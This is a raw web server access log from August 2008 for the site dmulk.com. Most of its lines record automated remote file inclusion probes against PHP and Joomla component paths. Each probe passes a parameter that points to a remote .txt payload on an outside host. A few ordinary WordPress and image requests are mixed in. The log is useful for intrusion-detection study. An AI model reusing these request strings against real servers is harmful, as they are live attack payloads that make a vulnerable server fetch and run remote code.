83.64.132.254 - - [12/Aug/2008:09:22:20 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:22:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:22:37 -0700] "GET /logs/access_080313.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:22:53 -0700] "GET /logs/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:22:58 -0700] "GET /errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:23:11 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:23:19 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:23:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:23:20 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.22.159.237 - - [12/Aug/2008:09:23:20 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984&hl=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:23:29 -0700] "GET /logs/access_080228.log/config.inc.php?path_escape=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:23:30 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:23:31 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:23:36 -0700] "GET /logs//citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:23:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:23:38 -0700] "GET //citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:23:41 -0700] "GET /logs/access_080228.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:09:23:55 -0700] "GET /logs/access_080321.log//index.php?loc=&cat=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:09:23:57 -0700] "GET //index.php?loc=&cat=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 200 18397 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:09:23:58 -0700] "GET /logs//index.php?loc=&cat=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
167.83.101.23 - - [12/Aug/2008:09:24:01 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?s=ca77945f456f484029d31c59fcea736a&showtopic=36984" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:24:04 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:24:04 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:24:05 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:24:06 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:24:08 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:09:24:11 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:09:24:11 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:24:14 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.70.114 - - [12/Aug/2008:09:24:31 -0700] "GET /logs/errors.php?error=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:24:32 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:24:35 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 200 18605 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.70.114 - - [12/Aug/2008:09:24:35 -0700] "GET /errors.php?error=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:24:36 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:24:37 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:24:39 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:24:41 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:24:45 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:24:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:24:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:25:11 -0700] "GET /logs/access_080207.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:25:22 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:25:22 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:25:22 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:25:23 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:25:23 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:25:26 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:25:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:25:27 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:25:30 -0700] "GET /logs/access_080207.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:25:35 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:25:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:25:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:25:37 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
212.48.105.6 - - [12/Aug/2008:09:25:40 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:25:44 -0700] "GET /logs/access_080218.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:25:44 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:25:44 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:25:52 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:25:53 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:25:53 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:26:38 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:26:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:26:55 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:26:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:27:01 -0700] "GET /logs/access_080116.log//index.php?seite=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:27:02 -0700] "GET //index.php?seite=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:27:02 -0700] "GET /logs//index.php?seite=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:27:14 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:27:24 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:27:27 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:27:27 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:27:33 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:27:37 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:27:43 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:27:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:27:44 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:28:37 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:28:42 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:28:42 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:28:52 -0700] "GET /logs//plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:28:53 -0700] "GET //plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:29:11 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:29:15 -0700] "GET /logs/access_080218.log/index.php?main=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:29:19 -0700] "GET /index.php?main=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:29:21 -0700] "GET /logs/index.php?main=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:29:25 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:29:28 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:29:28 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:29:37 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
70.85.201.66 - - [12/Aug/2008:09:30:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://samehzone.myftp.org/bookmark4u/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.201.66 - - [12/Aug/2008:09:30:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://samehzone.myftp.org/bookmark4u/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:30:25 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:30:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:30:36 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:30:37 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:30:39 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:30:39 -0700] "GET /logs/access_071230.log//index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:30:57 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:30:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:31:02 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
